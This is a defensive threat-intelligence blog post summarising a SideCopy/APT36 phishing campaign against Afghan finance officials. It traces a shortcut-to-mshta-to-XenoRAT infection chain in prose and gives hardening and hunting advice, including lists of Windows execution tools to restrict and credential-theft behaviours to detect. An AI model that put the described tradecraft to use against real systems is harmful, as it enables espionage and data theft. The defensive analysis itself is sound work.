SideCopy’s latest Afghanistan-focused campaign is a useful reminder that targeted phishing does not have to be technically exotic at the first click. The sophistication is in the preparation: language, local context, believable administrative documents, and a payload chain built to survive long enough for hands-on-keyboard access.
According to reporting from GBHackers, based on Seqrite Labs research, the Pakistan-linked SideCopy cluster, associated with Transparent Tribe/APT36, targeted Afghanistan’s Ministry of Finance and provincial revenue directorates with a Pashto-language lure. The infection chain led to a customized XenoRAT implant with persistence, in-memory execution, AMSI bypass behavior, and encrypted command-and-control traffic.
What happened
The campaign began with a ZIP archive containing a malicious Windows shortcut file disguised as a PDF. The filename referenced employees introduced to an “intellectual and psychological warfare seminar,” a lure that makes sense for the target environment instead of relying on a generic invoice, resume, or policy update.
Once opened, the shortcut abused mshta.exe to retrieve a remote HTA payload from a compromised Afghan education domain. Follow-on stages used obfuscated JavaScript, .NET loaders, registry persistence masquerading as an Edge-related entry, and reflective execution before delivering XenoRAT 1.8.7.
The decoy document reportedly contained a detailed provincial Ministry of Finance staff directory covering all 34 Afghan provinces, including names, roles, and mobile numbers. That matters because it suggests the operator conducted reconnaissance before delivery and shaped the lure around real internal context.
Why it matters
For small businesses, local governments, nonprofits, and government contractors, the lesson is not limited to Afghanistan or APT36. This is the pattern defenders should care about:
- Localized lures beat generic awareness training. A phishing email written in the right language with believable internal subject matter can bypass the “spot the typo” model of user training.
- LOLBIN abuse still works. Tools like
mshta.exe, script interpreters, and trusted Windows components remain useful to attackers because many environments do not restrict them tightly. - RAT payloads are operational access, not just malware. XenoRAT capabilities such as keylogging, screen capture, webcam access, SOCKS tunneling, and remote command execution can turn one workstation into a persistent intelligence collection point.
- Compromised legitimate domains reduce suspicion. Hosting early-stage payloads on regionally relevant infrastructure makes network indicators harder to dismiss as obviously malicious.
Defensive takeaways
1. Restrict high-risk script execution
If your users do not need HTA execution, restrict or monitor mshta.exe. The same goes for other common living-off-the-land execution paths such as wscript.exe, cscript.exe, rundll32.exe, and PowerShell child processes launched from document-opening workflows.
2. Alert on suspicious parent-child chains
A shortcut file launching mshta.exe, followed by script execution, registry writes, public-folder staging, or outbound connections should be high-signal. Even if each event looks ordinary alone, the chain is not normal office behavior.
3. Treat local-language phishing as a control problem
Awareness training should include examples that match the organization’s actual language, departments, partners, and workflow. A finance office should see finance-themed lures. A contractor should see procurement, onboarding, subcontractor, and portal-themed lures.
4. Monitor persistence in user-writable paths
This campaign used public/user-accessible directories and registry run keys for persistence. Baseline and alert on new autoruns, especially entries with misspellings or typosquatting names designed to resemble legitimate software.
5. Hunt for RAT behaviors, not only known hashes
Hashes change quickly. Defenders should also hunt for screen capture activity, unexpected SOCKS tunneling, unusual encrypted TCP sessions, access to browser credential stores, and remote-control tooling from endpoints that should not perform those actions.
Bulwark Black assessment
SideCopy’s XenoRAT campaign shows how public-sector targeting increasingly blends old and new tradecraft: simple phishing delivery, strong local context, trusted Windows binaries, fileless execution, and commodity/custom RAT capabilities. The initial file may be mundane, but the operational outcome is serious: persistent access inside government finance workflows.
For SMBs and government contractors, the practical move is to reduce execution paths before the lure lands. Block risky script handlers where possible, tune EDR around process chains, harden endpoint autoruns, and make phishing simulations look like the real business context attackers would study.
Original reporting: GBHackers — SideCopy Deploys Persistent XenoRAT Against Afghanistan Finance Ministry. Primary technical analysis: Seqrite Labs — Operation XENOFISCAL.
